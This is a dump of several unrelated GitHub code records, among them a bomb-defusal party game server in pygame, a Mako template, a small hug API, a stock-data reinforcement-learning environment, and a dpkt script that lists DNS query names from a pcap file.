pick_led_colours(bomb['leds'])\n elif bomb['status'] == ACTIVE:\n if time.time() > bomb['fuse_end']:\n #kaboom\n bomb['status'] = EXPLODED\n pygame.mixer.Sound.play(explode)\n pygame.mixer.music.stop()\n else:\n pygame.mixer.Sound.play(beep)\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n quitgame()\n if event.key == pygame.K_v:\n easy_mode = True\n fuse = 6\n print(f'Easy mode: {easy_mode}')\n restart_bomb()\n elif event.key == pygame.K_x:\n easy_mode = False\n fuse = 5\n restart_bomb()\n elif event.type == pygame.QUIT:\n quitgame()\n gameDisplay.fill(black)\n timer = '0:00'\n\n\n for i in range(0, tiley):\n for j in range(0,tilex):\n gameDisplay.blit(background, (j*bg_width,i*bg_height))\n\n #TODO: Create a function for writing to the middle message\n if bomb['status'] == INITIALISING:\n info_display('Bomb is arming...')\n timer = format_time(int(bomb['fuse_start']-time.time()))\n elif bomb['status'] == ACTIVE:\n info_display('Bomb is active!')\n timer = format_time(int(bomb['fuse_end']-time.time()))\n elif bomb['status'] == DEFUSED:\n info_display('Bomb has been defused.') #TODO: have a nice day\n elif bomb['status'] == EXPLODED:\n info_display('Bomb exploded.') #TODO: Sad face\n\n timer_screen = pygame.transform.scale(timer_screen, (218, 88))\n gameDisplay.blit(timer_screen, (h_centre - 109, v_centre - 40))\n TimerSurf, TimerRect = text_objects(timer, largeText, bright_green)\n TimerRect.center = ((display_width / 2), (display_height / 2))\n back_surf, back_rect = text_objects('8:88', timer_backing, dim_green)\n back_rect.center = ((display_width / 2), (display_height / 2))\n gameDisplay.blit(back_surf, back_rect)\n gameDisplay.blit(TimerSurf, TimerRect)\n \n led_x = r_column - l_column\n led_y = b_row - 150\n leds = decode_leds(bomb['leds'])\n led_colour = 0\n for led in leds:\n place_led(led, leds[led], led_x, led_y, led_colours[led_colour])\n led_y += 50\n led_colour += 1\n\n place_strikes(bomb['strikes'])\n\n place_serial(bomb['serial'])\n\n place_modules(module_leds)\n\n button(\"Restart\", l_column, b_row - 50, 100, 50, green, bright_green, restart_bomb)\n button(\"Quit\", l_column + 120, b_row - 50, 100, 50, red, bright_red, quitgame)\n\n pygame.display.update()\n dt = clock.tick(15)\n\n READ_SOCKETS, WRITE_SOCKETS, ERROR_SOCKETS = select(CONNECTION_LIST, [], [],0)\n for SOCK in READ_SOCKETS:\n if SOCK == SERVER_SOCKET:\n SOCKFD, ADDR = 
SERVER_SOCKET.accept()\n CONNECTION_LIST.append(SOCKFD)\n print(f'\\rClient {ADDR[0]} {ADDR[1]} connected.')\n else:\n try:\n DATA = SOCK.recv(RECV_BUFFER)\n if DATA:\n request = DATA.decode().strip()\n if 'status' == request:\n print('Requested status...')\n SOCK.send(str(bomb['status']).encode())\n elif 'serial' == request:\n print('Requested serial...')\n SOCK.send(bomb['serial'].encode())\n elif 'leds' == request:\n print('Requested LEDs')\n SOCK.send(bomb['leds'].encode())\n elif 'strikes' == request:\n print('Requested strikes')\n SOCK.send(str(bomb['strikes']).encode())\n elif 'defuser' == request:\n print('Requested defuser name.')\n #TODO: not part of object yet\n elif 'fuse_start' == request:\n print('Requested fuse start time.')\n SOCK.send(str(bomb['fuse_start']).encode())\n elif 'fuse_end' == request:\n print('Requested fuse end time.')\n SOCK.send(str(bomb['fuse_end']).encode())\n elif 'time_remaining' == request:\n print('Requested time remaining.')\n SOCK.send(str(int(bomb['fuse_end']-time.time())).encode())\n elif 'add_strike' == request:\n print('Adding a strike.')\n bomb = add_strike(bomb)\n SOCK.send(str(bomb['strikes']).encode())\n elif 'disarm' in request:\n #TODO: allow only one disarm per module registered\n mod_id = request[6:]\n print(f'Disarm request: {mod_id}')\n bomb = disarm_module(bomb)\n module_leds[mod_id] = green_led\n SOCK.send(str(bomb['status']).encode())\n elif 'register' in request:\n mod_id = request[8:]\n registered = 0\n print(f'Register module: {mod_id}')\n if bomb['status'] == INITIALISING and not (mod_id in module_leds):\n bomb['modules'] += 1\n module_leds[mod_id] = red_led\n registered = 1\n print('Registered!')\n print(f\"Modules: {bomb['modules']}\")\n elif bomb['status'] == ACTIVE and mod_id in module_leds:\n registered = 1\n print('Already registered!')\n SOCK.send(str(registered).encode())\n elif 'mode' == request:\n if easy_mode:\n response = 'easy'\n else:\n response = 'hard'\n SOCK.send(response.encode())\n elif 'bomb_object' == request:\n print('Requested whole object.')\n SOCK.send(json_bomb.encode())\n else:\n print('Unknown request...')\n except Exception as msg:\n print(type(msg).__name__, msg)\n print(f'\\rClient {ADDR[0]} {ADDR[1]} disconnected.')\n SOCK.close()\n try:\n CONNECTION_LIST.remove(SOCK)\n except ValueError as msg:\n print(f'{type(msg).__name__}:{msg}')\n continue\nSERVER_SOCKET.close()\n","repo_name":"paralinguist/KTANE_network","sub_path":"bomb_server.py","file_name":"bomb_server.py","file_ext":"py","file_size_in_byte":16333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"18777642767","text":"# -*- coding:utf-8 -*-\nfrom mako import runtime, filters, cache\nUNDEFINED = runtime.UNDEFINED\nSTOP_RENDERING = runtime.STOP_RENDERING\n__M_dict_builtin = dict\n__M_locals_builtin = locals\n_magic_number = 10\n_modified_time = 1460095264.574406\n_enable_loop = True\n_template_filename = '/Users/Jordan/Documents/BYU/0 - Senior Year/0 - Winter 2016/0 - 413/Colonial_Heritage_Foundation/manager/templates/index.html'\n_template_uri = 'index.html'\n_source_encoding = 'utf-8'\nimport os, os.path, re, json\n_exports = ['top_content_area']\n\n\ndef _mako_get_namespace(context, name):\n try:\n return context.namespaces[(__name__, name)]\n except KeyError:\n _mako_generate_namespaces(context)\n return context.namespaces[(__name__, name)]\ndef _mako_generate_namespaces(context):\n pass\ndef _mako_inherit(template, context):\n _mako_generate_namespaces(context)\n return 
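# A minimal client sketch (not part of the repository above) for the bomb server's
# plain-text TCP protocol on PORT 9876, whose accept loop answers commands such as
# 'status', 'serial', 'time_remaining', 'register<id>' and 'disarm<id>'. The host
# and the module id below are illustrative assumptions.
import socket

def query_bomb(command, host="127.0.0.1", port=9876):
    """Send one protocol command to the bomb server and return its reply."""
    with socket.create_connection((host, port), timeout=5) as sock:
        sock.sendall(command.encode())
        return sock.recv(4096).decode()

# Usage, e.g. from a defusable module:
# query_bomb("registerwires01")   # register during the INITIALISING phase
# query_bomb("status")            # poll until the bomb goes ACTIVE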
runtime._inherit_from(context, 'app_base.htm', _template_uri)\ndef render_body(context,**pageargs):\n __M_caller = context.caller_stack._push_frame()\n try:\n __M_locals = __M_dict_builtin(pageargs=pageargs)\n def top_content_area():\n return render_top_content_area(context._locals(__M_locals))\n __M_writer = context.writer()\n __M_writer('\\n\\n')\n if 'parent' not in context._data or not hasattr(context._data['parent'], 'top_content_area'):\n context['self'].top_content_area(**pageargs)\n \n\n __M_writer('\\n')\n return ''\n finally:\n context.caller_stack._pop_frame()\n\n\ndef render_top_content_area(context,**pageargs):\n __M_caller = context.caller_stack._push_frame()\n try:\n def top_content_area():\n return render_top_content_area(context)\n __M_writer = context.writer()\n __M_writer('\\nColonial Heritage Foundation Administrator Area\\n\\n\\n')\n __M_writer('Welcome to the admin area of chfsales.com.\\n \\n')\n return ''\n finally:\n context.caller_stack._pop_frame()\n\n\n\"\"\"\n__M_BEGIN_METADATA\n{\"line_map\": {\"35\": 1, \"52\": 3, \"53\": 8, \"54\": 14, \"40\": 17, \"60\": 54, \"28\": 0, \"46\": 3}, \"uri\": \"index.html\", \"filename\": \"/Users/Jordan/Documents/BYU/0 - Senior Year/0 - Winter 2016/0 - 413/Colonial_Heritage_Foundation/manager/templates/index.html\", \"source_encoding\": \"utf-8\"}\n__M_END_METADATA\n\"\"\"\n","repo_name":"jwiddison/Django-Mako-Plus-Ecommerce-Site","sub_path":"manager/cached_templates/templates/index.html.py","file_name":"index.html.py","file_ext":"py","file_size_in_byte":2669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"72873013560","text":"# pylint: disable=C0111, E0401\n\"\"\" API Entry Point \"\"\"\n\nimport json\n\nimport hug\nimport urllib3\n\nhttp = urllib3.PoolManager()\n\n@hug.get(\"/\", output=hug.output_format.html)\ndef base():\n return \"hello from ck_kis
\"\n\n\n@hug.get(\"/remote\")\ndef remote():\n r = http.request(\n 'GET',\n 'http://ck_kis_companies_nginx/add',\n fields={'num': 2}\n )\n\n if r.status == 200:\n return json.loads(r.data.decode('utf-8'))\n else:\n return json.loads({})\n","repo_name":"carlok/docker-network-boilerplate","sub_path":"ck_kis/api/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"24972322712","text":"import numpy as np\nimport sys\n\n# np.seterr(divide='ignore', invalid='ignore')\n\n\ndef printProgress(iteration, total, prefix='', suffix='', decimals=1, barLength=100):\n formatStr = \"{0:.\" + str(decimals) + \"f}\"\n percent = formatStr.format(100 * (iteration / float(total)))\n filledLength = int(round(barLength * iteration / float(total)))\n bar = '#' * filledLength + '-' * (barLength - filledLength)\n sys.stdout.write('\\r%s |%s| %s%s %s' % (prefix, bar, percent, '%', suffix)),\n if iteration == total:\n sys.stdout.write('\\n')\n sys.stdout.flush()\n\n\n\nclass Monitor(object):\n\tdef __init__(self, on=True):\n\t\tself.on = on\n\t\tself._HISTORY_ = {'ACTION':{'RESULT':[]}}\n\n\n\tdef history(self, action, result):\n\t\tself._HISTORY_['ACTION']['RESULT'].append(int(action == result))\n\n\n\tdef show(self, request):\n\t\tif request not in ['episod', 'anobservationset', 'anepoch', 'oneview']:\n\t\t\tprint('Invalid request type. Please check the option to request history.')\n\t\t\texit()\n\n\t\tif request == 'episod':\n\t\t\tsuccess = np.sum(self._HISTORY_['ACTION']['RESULT'])\n\t\t\tself._HISTORY_['ACTION']['RESULT'] = []\n\t\t\treturn success\n\n\t\telif request == 'anobservationset':\n\t\t\tpass\n\t\telif request == 'anepoch':\n\t\t\tpass\n\t\telse:\n\t\t\tpass\n\n\n\nclass Activities(object):\n\t_DISCOUNT_FACTOR_ = 0.995\n\n\tdef __init__(self, running_mode=0, epoch=1):\n\t\tself._COUNT_TOTAL_RUNNING_ = 0\n\n\t\t# running_type = 0: Training mode\n\t\t# running_type = 1: Testing mode\n\t\tself._ENV_ORSEVATIONS_ = Observations(running_mode, epoch)\n\t\tself.monitor = Monitor()\n\n\n\tdef _parse_current_observation(self):\n\t\ty_value = self._STATE_[-1]\n\t\tstate = self._STATE_[2:-1].astype('float')\n\t\t# state = (state - np.mean(state)) / np.std(state)\n\n\t\treturn state, y_value\n\n\n\tdef reset(self):\n\t\tself._SIZE_OF_CURRENT_DATESET_, epoch = self._ENV_ORSEVATIONS_.next_source()\n\t\treturn self._SIZE_OF_CURRENT_DATESET_, epoch\n\n\n\tdef step(self, preaction, action):\n\t\t_, y_value = self._parse_current_observation()\n\t\tdone = ~(action == y_value)\n\n\t\tprint(' ### PREDICTION: %s / %s, REAL: %s' % ('{0:2d}'.format(preaction), '{0:2d}'.format(action), '{0:2d}'.format(y_value)))\n\n\t\tif not done: reward = 1.\n\t\telse: reward = 0.1\n\n\t\tself.monitor.history(action, y_value)\n\n\t\treturn reward, done\n\n\n\tdef get_observation(self):\n\t\tself._STATE_ = self._ENV_ORSEVATIONS_.next_observation()\n\n\t\tif self._STATE_ is None:\n\t\t\treturn None\n\n\t\tself._COUNT_TOTAL_RUNNING_ += 1\n\t\tstate, _ = self._parse_current_observation()\n\t\treturn state\n\n\n\tdef get_size_of_an_epoch(self):\n\t\treturn self._ENV_ORSEVATIONS_.get_size_of_an_epoch()\n\n\n\tdef disount_rewards(self, rewards):\n\t\tdiscounted_rewards = np.zeros_like(rewards)\n\t\trunning_add = 0\n\t\tfor reversed_idx in reversed(range(0, rewards.size)):\n\t\t\trunning_add = running_add * self._DISCOUNT_FACTOR_ + rewards[reversed_idx]\n\t\t\tdiscounted_rewards[reversed_idx] = 
running_add\n\n\t\treturn discounted_rewards\n\n\n\tdef run_times(self):\n\t\treturn self._COUNT_TOTAL_RUNNING_\n\n\n\nclass Observations(object):\n\timport pandas as pd\n\tfrom databases import maria\n\n\n\t_RUNNING_MODE_ = None\n\n\t_RATE_SOURCE_TRAINING_ = None\n\n\t_SOURCE_SYMBOLS_ = None\n\t_SOURCE_CONNECTION_ = None\n\n\t_SIZE_SYMBOLS_ = None\n\t_SIZE_OBSERVATIONS_ = None\n\t_SIZE_OBSERVATIONS_IN_A_EPOCH_ = None\n\t_SIZE_EPOCH_ = None\n\n\t_CURRENT_SOURCE_OBSERVATIONS_ = None\n\t_CURRENT_SOURCE_SYMBOL_INDEX_ = None\n\t_CURRENT_OBSERVATION_INDEX_ = None\n\t_CURRENT_EPOCH_INDEX_ = None\n\n\tdef __init__(self, running_mode=0, epoch=1):\n\t\tself._RUNNING_MODE_ = running_mode\n\t\tself._SIZE_EPOCH_ = epoch\n\t\tself._RATE_SOURCE_TRAINING_ = 0.7\n\t\tself._SOURCE_CONNECTION_ = self.maria()\n\n\t\tquery_string = 'SELECT COUNT(*) count_symbols FROM krx_symbols'\n\t\tdf_result = self._SOURCE_CONNECTION_.select(query_string)\n\t\tcount_symbols = df_result.get_value(0, 'count_symbols')\n\n\t\tdivision_num = int(count_symbols * self._RATE_SOURCE_TRAINING_)\n\n\t\tquery_string = 'SELECT isin, 1 FROM krx_symbols WHERE isin = isin ORDER BY symb_name LIMIT %s, %s'\n\t\tvalues = [0 if running_mode == 0 else division_num,\n\t\t division_num if running_mode == 0 else count_symbols - division_num + 1]\n\t\t\n\t\tself._SOURCE_SYMBOLS_ = self._SOURCE_CONNECTION_.select(query_string, values)\n\t\tself._SIZE_SYMBOLS_ = len(self._SOURCE_SYMBOLS_)\n\t\tself._CURRENT_SOURCE_SYMBOL_INDEX_ = -1\n\t\tself._CURRENT_OBSERVATION_INDEX_ = -1\n\t\tself._CURRENT_EPOCH_INDEX_ = 0\n\n\t\tself._get_size_observations_in_a_epoch_()\n\n\n\tdef _get_size_observations_in_a_epoch_(self):\n\t\ttotal_symbol_size_in_a_epoch = 0\n\n\t\ti = 1\n\t\tfor isin, _ in self._SOURCE_SYMBOLS_.values:\n\t\t\tprintProgress(i, self._SIZE_SYMBOLS_, '', ' Initialized.', 2, 50)\n\n\t\t\tquery_string = 'SELECT COUNT(*) count_symbols FROM drl_proportion_source_1d WHERE isin = %s AND trans_date = trans_date'\n\t\t\tvalues = [isin]\n\t\t\tdf_result = self._SOURCE_CONNECTION_.select(query_string, values)\n\n\t\t\ttotal_symbol_size_in_a_epoch += df_result.get_value(0, 'count_symbols')\n\n\t\t\ti += 1\n\n\t\tself._SIZE_OBSERVATIONS_IN_A_EPOCH_ = total_symbol_size_in_a_epoch\n\n\n\tdef next_source(self):\n\t\tself._CURRENT_SOURCE_SYMBOL_INDEX_ += 1\n\n\t\tif self._CURRENT_SOURCE_SYMBOL_INDEX_ == len(self._SOURCE_SYMBOLS_):\n\t\t\tself._CURRENT_EPOCH_INDEX_ += 1\n\t\t\tself._CURRENT_SOURCE_SYMBOL_INDEX_ = 0\n\t\t\t\n\t\t\tif self._CURRENT_EPOCH_INDEX_ == self._SIZE_EPOCH_:\n\t\t\t\tself._CURRENT_EPOCH_INDEX_ = -1\n\t\t\t\treturn -1, self._SIZE_EPOCH_\n\n\t\tisin = self._SOURCE_SYMBOLS_.loc[self._CURRENT_SOURCE_SYMBOL_INDEX_, 'isin']\n\n\t\tquery_string = 'SELECT * ' + \\\n\t\t\t\t\t\t'FROM drl_proportion_source_1d ' + \\\n\t\t\t\t\t\t'WHERE isin = %s AND trans_date = trans_date ' + \\\n\t\t\t\t\t\t'ORDER BY trans_date'\n\t\tvalues = [isin]\n\t\tself._CURRENT_SOURCE_OBSERVATIONS_ = self._SOURCE_CONNECTION_.select(query_string, values)\n\t\tself._SIZE_OBSERVATIONS_ = len(self._CURRENT_SOURCE_OBSERVATIONS_)\n\t\treturn self._SIZE_OBSERVATIONS_, self._CURRENT_EPOCH_INDEX_\n\n\n\tdef next_observation(self):\n\t\tself._CURRENT_OBSERVATION_INDEX_ += 1\n\n\t\tif(self._CURRENT_OBSERVATION_INDEX_ == len(self._CURRENT_SOURCE_OBSERVATIONS_)):\n\t\t\tself._CURRENT_OBSERVATION_INDEX_ = -1\n\t\t\treturn None\n\n\t\tobservation = self._CURRENT_SOURCE_OBSERVATIONS_.loc[self._CURRENT_OBSERVATION_INDEX_, ]\n\t\treturn np.array(observation.values)\n\n\n\tdef 
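# Both disount_rewards() methods in this file implement the discounted-return
# recurrence G_t = r_t + gamma * G_{t+1}. A self-contained sketch of the same loop,
# cross-checked against an equivalent IIR-filter form (scipy is assumed here only
# for the cross-check; the repo itself needs just numpy).
import numpy as np
from scipy.signal import lfilter

def discount_rewards(rewards, gamma=0.995):
    out = np.zeros_like(rewards, dtype=float)
    running = 0.0
    for t in reversed(range(len(rewards))):   # accumulate from the last step backwards
        running = running * gamma + rewards[t]
        out[t] = running
    return out

r = np.array([1.0, 0.1, 1.0])
# lfilter applies y[n] = x[n] + gamma * y[n-1]; running it over the reversed rewards
# and reversing the result reproduces the loop above exactly.
assert np.allclose(discount_rewards(r), lfilter([1.0], [1.0, -0.995], r[::-1])[::-1])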
get_size_of_an_epoch(self):\n\t\treturn self._SIZE_OBSERVATIONS_IN_A_EPOCH_\n\n\n\tdef get_index_of_current_datasource(self):\n\t\treturn self._CURRENT_OBSERVATION_INDEX_\n\n\n\nclass DeepNeuralNetwork(object):\n\t_BUFFER_RMS_BACK_PROPAGATION_ = []\n\t_BUFFER_COST_GRADIENTDESCENT_ = []\n\t_BUFFER_LAYER1_ = None\n\t_BUFFER_LAYER2_ = None\n\t_BUFFER_LAYER3_ = None\n\t_BUFFER_LAYER4_ = None\n\t_BUFFER_LAYER5_ = None\n\t_BUFFER_LAYER6_ = None\n\n\t_MODEL_ = {}\n\t\n\t_SIZE_BATCH_ = 10\n\t_INDEX_CURRENT_LAYER_BUFFER_ = 0\n\n\t_RATE_DECAY_ = 0.995\n\t_RATE_LEARNING_ = 0.001\n\n\tdef __init__(self, out_dim, input_dim):\n\t\tnp.random.seed(1)\n\n\t\tself._MODEL_['W1'] = self.xavier(input_dim**2, input_dim)\n\t\tself._MODEL_['W2'] = self.xavier(input_dim**2, input_dim**2)\n\t\tself._MODEL_['W3'] = self.xavier(input_dim**2, input_dim**2)\n\t\tself._MODEL_['W4'] = self.xavier(input_dim**2, input_dim**2)\n\t\tself._MODEL_['W5'] = self.xavier(input_dim**2, input_dim**2)\n\t\tself._MODEL_['W6'] = self.xavier(input_dim, input_dim**2)\n\t\tself._MODEL_['W7'] = self.xavier(out_dim, input_dim)\n\n\t\tfor _ in range(self._SIZE_BATCH_):\n\t\t\tself._BUFFER_COST_GRADIENTDESCENT_.append({key: np.zeros_like(values) for key, values in self._MODEL_.items()})\n\n\t\tself._BUFFER_RMS_BACK_PROPAGATION_ = {key: np.zeros_like(values) for key, values in self._MODEL_.items()}\n\t\tself._init_layer_buf()\n\n\tdef _init_layer_buf(self):\n\t\tself._BUFFER_LAYER1_ = []\n\t\tself._BUFFER_LAYER2_ = []\n\t\tself._BUFFER_LAYER3_ = []\n\t\tself._BUFFER_LAYER4_ = []\n\t\tself._BUFFER_LAYER5_ = []\n\t\tself._BUFFER_LAYER6_ = []\n\t\tself._INDEX_CURRENT_LAYER_BUFFER_ = 0\n\n\n\tdef _release_layer_buf(self):\n\t\tself._BUFFER_LAYER1_ = np.vstack(self._BUFFER_LAYER1_)\n\t\tself._BUFFER_LAYER2_ = np.vstack(self._BUFFER_LAYER2_)\n\t\tself._BUFFER_LAYER3_ = np.vstack(self._BUFFER_LAYER3_)\n\t\tself._BUFFER_LAYER4_ = np.vstack(self._BUFFER_LAYER4_)\n\t\tself._BUFFER_LAYER5_ = np.vstack(self._BUFFER_LAYER5_)\n\t\tself._BUFFER_LAYER6_ = np.vstack(self._BUFFER_LAYER6_)\n\n\n\t# Policy Forward\n\tdef feed_forward(self, x):\n\t\tself._BUFFER_LAYER1_.append(self.ReLU(np.dot(self._MODEL_['W1'], x))) # 1st Layer\n\t\tself._BUFFER_LAYER2_.append(self.ReLU(np.dot(self._MODEL_['W2'], self._BUFFER_LAYER1_[self._INDEX_CURRENT_LAYER_BUFFER_]))) # 2nd Layer\n\t\tself._BUFFER_LAYER3_.append(self.ReLU(np.dot(self._MODEL_['W3'], self._BUFFER_LAYER2_[self._INDEX_CURRENT_LAYER_BUFFER_]))) # 3rd Layer\n\t\tself._BUFFER_LAYER4_.append(self.ReLU(np.dot(self._MODEL_['W4'], self._BUFFER_LAYER3_[self._INDEX_CURRENT_LAYER_BUFFER_]))) # 4th Layer\n\t\tself._BUFFER_LAYER5_.append(self.ReLU(np.dot(self._MODEL_['W5'], self._BUFFER_LAYER4_[self._INDEX_CURRENT_LAYER_BUFFER_]))) # 5rd Layer\n\t\tself._BUFFER_LAYER6_.append(self.ReLU(np.dot(self._MODEL_['W6'], self._BUFFER_LAYER5_[self._INDEX_CURRENT_LAYER_BUFFER_]))) # 6th Layer\n\t\thypothesis = self.softmax(np.dot(self._MODEL_['W7'], self._BUFFER_LAYER6_[self._INDEX_CURRENT_LAYER_BUFFER_])) # 7th Layer / Hypothesis Layer\n\n\t\tself._INDEX_CURRENT_LAYER_BUFFER_ += 1\n\t\treturn hypothesis\n\n\n\t# Poliby Backward - Back Propagation\n\tdef feed_backward(self, states, policygradient_errs, episode):\n\t\tself._release_layer_buf()\n\n\t\tH_rmsprotagation_Layer6 = np.dot(policygradient_errs, self._MODEL_['W7'])\n\t\tD_rmsprotagation_Layer6 = self._BUFFER_LAYER6_ * (1 - self._BUFFER_LAYER6_)\n\t\tW_rmsprotagation_Layer6 = H_rmsprotagation_Layer6 * D_rmsprotagation_Layer6\n\n\t\tH_rmsprotagation_Layer5 = 
np.dot(W_rmsprotagation_Layer6, self._MODEL_['W6'])\n\t\tD_rmsprotagation_Layer5 = self._BUFFER_LAYER5_ * (1 - self._BUFFER_LAYER5_)\n\t\tW_rmsprotagation_Layer5 = H_rmsprotagation_Layer5 * D_rmsprotagation_Layer5\n\n\t\tH_rmsprotagation_Layer4 = np.dot(W_rmsprotagation_Layer5, self._MODEL_['W5'])\n\t\tD_rmsprotagation_Layer4 = self._BUFFER_LAYER4_ * (1 - self._BUFFER_LAYER4_)\n\t\tW_rmsprotagation_Layer4 = H_rmsprotagation_Layer4 * D_rmsprotagation_Layer4\n\n\t\tH_rmsprotagation_Layer3 = np.dot(W_rmsprotagation_Layer4, self._MODEL_['W4'])\n\t\tD_rmsprotagation_Layer3 = self._BUFFER_LAYER3_ * (1 - self._BUFFER_LAYER3_)\n\t\tW_rmsprotagation_Layer3 = H_rmsprotagation_Layer3 * D_rmsprotagation_Layer3\n\n\t\tH_rmsprotagation_Layer2 = np.dot(W_rmsprotagation_Layer3, self._MODEL_['W3'])\n\t\tD_rmsprotagation_Layer2 = self._BUFFER_LAYER2_ * (1 - self._BUFFER_LAYER2_)\n\t\tW_rmsprotagation_Layer2 = H_rmsprotagation_Layer2 * D_rmsprotagation_Layer2\n\n\t\tH_rmsprotagation_Layer1 = np.dot(W_rmsprotagation_Layer2, self._MODEL_['W2'])\n\t\tD_rmsprotagation_Layer1 = self._BUFFER_LAYER1_ * (1 - self._BUFFER_LAYER1_)\n\t\tW_rmsprotagation_Layer1 = H_rmsprotagation_Layer1 * D_rmsprotagation_Layer1\n\n\t\tW_rmsprotagation_Layer7 = np.dot(self._BUFFER_LAYER6_.T, policygradient_errs).T\n\t\tW_rmsprotagation_Layer6 = np.dot(W_rmsprotagation_Layer6.T, self._BUFFER_LAYER5_)\n\t\tW_rmsprotagation_Layer5 = np.dot(W_rmsprotagation_Layer5.T, self._BUFFER_LAYER4_)\n\t\tW_rmsprotagation_Layer4 = np.dot(W_rmsprotagation_Layer4.T, self._BUFFER_LAYER3_)\n\t\tW_rmsprotagation_Layer3 = np.dot(W_rmsprotagation_Layer3.T, self._BUFFER_LAYER2_)\n\t\tW_rmsprotagation_Layer2 = np.dot(W_rmsprotagation_Layer2.T, self._BUFFER_LAYER1_)\n\t\tW_rmsprotagation_Layer1 = np.dot(W_rmsprotagation_Layer1.T, states)\n\n\t\tself._BUFFER_COST_GRADIENTDESCENT_[episode % self._SIZE_BATCH_] = {\n\t\t\t'W1': W_rmsprotagation_Layer1,\n\t\t\t'W2': W_rmsprotagation_Layer2,\n\t\t\t'W3': W_rmsprotagation_Layer3,\n\t\t\t'W4': W_rmsprotagation_Layer4,\n\t\t\t'W5': W_rmsprotagation_Layer5,\n\t\t\t'W6': W_rmsprotagation_Layer6,\n\t\t\t'W7': W_rmsprotagation_Layer7\n\t\t}\n\t\tself._init_layer_buf()\n\n\n\tdef deep_learning(self):\n\t\t# Skip the zeros buffer, it was assigned zeros to add the learned values new assigning to...\n\t\t# So, the process will be stated from 1.\n\t\tcost_optimized_layers = self._BUFFER_COST_GRADIENTDESCENT_[0]\n\n\t\tfor i in range(1, self._SIZE_BATCH_):\n\t\t\tfor key, values in self._MODEL_.items():\n\t\t\t\tcost_optimized_layers[key] += self._BUFFER_COST_GRADIENTDESCENT_[i][key]\n\n\t\tfor key, values in self._MODEL_.items():\n\t\t\tcost_optimized_layer = cost_optimized_layers[key]\n\t\t\tself._BUFFER_RMS_BACK_PROPAGATION_[key] = self._RATE_DECAY_ * self._BUFFER_RMS_BACK_PROPAGATION_[key] + \\\n\t\t\t (1 - self._RATE_DECAY_) * cost_optimized_layer**2\n\t\t\tself._MODEL_[key] += self._RATE_LEARNING_ * cost_optimized_layer / (np.sqrt(self._BUFFER_RMS_BACK_PROPAGATION_[key]) + 1e-5)\n\n\n\tdef model(self):\n\t\treturn self._MODEL_\n\n\n\tdef xavier(self, out_dim, in_dim, prime=False):\n\t\treturn np.random.randn(out_dim, in_dim) / np.sqrt(in_dim / 2 if prime else 1)\n\n\n\tdef sigmoid(self, x):\n\t\treturn 1.0 / (1.0 + np.exp(-x))\n\n\n\tdef softmax(self, x):\n\t\te = np.exp(x - np.max(x)) # prevent overflow\n\t\tif e.ndim == 1:\n\t\t\treturn e / np.sum(e, axis=0)\n\t\telse:\n\t\t\treturn e / np.array([np.sum(e, axis=1)]).T # ndim = 2\n\n\n\tdef ReLU(self, x):\n\t\treturn x * (x > 0)\n\n\tdef onthot(self, x):\n\t\tx = 
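# Note: feed_backward() above multiplies by layer * (1 - layer), which is the
# derivative of the *sigmoid*, while feed_forward() applies ReLU activations. A
# minimal sketch of the derivative that actually matches ReLU -- an indicator on
# positive activations:
import numpy as np

def relu(x):
    return x * (x > 0)

def relu_grad(activation):
    # d/dx ReLU(x) = 1 where the activation is positive, 0 elsewhere
    return (activation > 0).astype(float)

a = relu(np.array([-2.0, 0.5, 3.0]))          # -> [0.0, 0.5, 3.0]
assert np.array_equal(relu_grad(a), np.array([0.0, 1.0, 1.0]))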
x.reshape(-1)\n\t\treturn np.eye(len(x))[np.argmax(x)]\n\n\n\nclass ReinforcementLearning(object):\n\t_DISCOUNT_FACTOR_ = 0.995\n\n\tdef __init__(self):\n\t\tpass\n\n\tdef disount_rewards(self, rewards):\n\t\tdiscounted_rewards = np.zeros_like(rewards)\n\t\trunning_add = 0\n\t\tfor reversed_idx in reversed(range(0, rewards.size)):\n\t\t\trunning_add = running_add * self._DISCOUNT_FACTOR_ + rewards[reversed_idx]\n\t\t\tdiscounted_rewards[reversed_idx] = running_add\n\n\t\treturn discounted_rewards\n\n\n","repo_name":"PeterDeSOM/innostock","sub_path":"core/environments.py","file_name":"environments.py","file_ext":"py","file_size_in_byte":13356,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"43588779690","text":"def grep(filename,wrd):\r\n with open(filename) as f:\r\n for line in f:\r\n \r\n if wrd in line:\r\n m=line.split(',')\r\n for n in m:\r\n return n\r\ny=grep('input.txt','Facebook')\r\nprint(y)\r\n","repo_name":"imnmo/Python-Introduction","sub_path":"Python Hands On/Python Introduction/MId term/files.py","file_name":"files.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"15214562911","text":"import dpkt\nimport socket\nf = open('f*cking_pcap+file.pcap', 'rb')\npcap = dpkt.pcap.Reader(f)\nfor ts, buf in pcap:\n eth = dpkt.ethernet.Ethernet(buf)\n ip = eth.data\n udp = ip.data\n dns = dpkt.dns.DNS(udp.data)\n\n #checking if the packet is a DNS query\n if dns.qr == dpkt.dns.DNS_Q:\n #extracting the domain name from the query\n domain_name = dns.qd[0].name\n #extracting the IP address from the query\n ip_address = socket.inet_ntoa(ip.src)\n #printing the domain name and IP address\n print('Domain Name: %s, IP Address: %s' % (domain_name, ip_address))\n","repo_name":"odintheprotector/DNS-Exfiltration","sub_path":"script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"16955060099","text":"from flask import Flask, render_template, url_for, redirect, flash\r\nfrom forms import getpicture\r\nfrom functions import apiRequest\r\nimport json\r\n\r\napp = Flask(__name__)\r\n\r\napp.config['SECRET_KEY'] = ''\r\napi_key = ''\r\n\r\n\r\n@app.route('/')\r\n@app.route('/home')\r\ndef home():\r\n return render_template('home.html', title='Cosmonautinspace')\r\n\r\n@app.route('/postcards', methods = ['GET', 'POST'])\r\ndef postcard_home():\r\n form = getpicture()\r\n if form.validate_on_submit():\r\n apiRequest(api_key, form.pictureDate.data, form.rover.data)\r\n return redirect(url_for('postcards', 